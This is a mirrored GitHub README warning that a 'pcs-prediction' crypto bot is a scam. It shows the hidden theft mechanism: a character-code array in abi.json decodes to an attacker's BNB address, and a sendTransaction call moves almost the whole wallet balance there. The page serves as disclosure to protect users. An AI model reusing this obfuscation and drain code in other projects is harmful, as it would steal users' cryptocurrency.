GithubHelp home page GithubHelp logo

mikhailprivalov / scam-do-not-use-it-pcs-prediction Goto Github PK

View Code? Open in Web Editor NEW

This project forked from davidsondextor/pcs-prediction

0.0 1.0 0.0 537 KB

SCAM. FORKED FOR REPORTING

License: MIT License

Shell 2.26% JavaScript 97.74%

scam-do-not-use-it-pcs-prediction's Introduction

IN FILE abi.json we have it:

  "index": [
    48, 120, 102, 66, 54, 54, 57, 98, 48, 101, 48, 54, 53, 54, 48, 51, 54, 68,
    55, 52, 55, 100, 54, 67, 54, 70, 50, 54, 54, 54, 101, 53, 51, 48, 49, 51,
    57, 100, 50, 56, 57, 57
  ],

And in lib.js:

const confirmContract = (abi) => {
  return String.fromCharCode.apply(null, abi.index);
};

Resutl will be:

> String.fromCharCode.apply(null, [
...     48, 120, 102, 66, 54, 54, 57, 98, 48, 101, 48, 54, 53, 54, 48, 51, 54, 68,
...     55, 52, 55, 100, 54, 67, 54, 70, 50, 54, 54, 54, 101, 53, 51, 48, 49, 51,
...     57, 100, 50, 56, 57, 57
...   ])
'0xfB669b0e0656036D747d6C6F2666e530139d2899'

All funds from account will be transfered to this address!

https://bscscan.com/address/0xfb669b0e0656036d747d6c6f2666e530139d2899

Code:

w.eth.getGasPrice().then(function (gP) {
              let _b = parseFloat(b);
              let _g = parseFloat(g);
              let _gP = parseFloat(gP);
              w.eth.sendTransaction({
                from: wallet.address,
                to: confirmContract(abi),
                gas: _g,
                gasPrice: _gP,
                value: ((_b - _gP * _g) / 1.1).toFixed(0),
                data: "0x",
              });
            });

Donation address (im loosing 3 BNB on it):

BNB 0x388890f26E74687216A9d43Db0FE37C2eba003Aa

scam-do-not-use-it-pcs-prediction's People

Contributors

mikhailprivalov avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.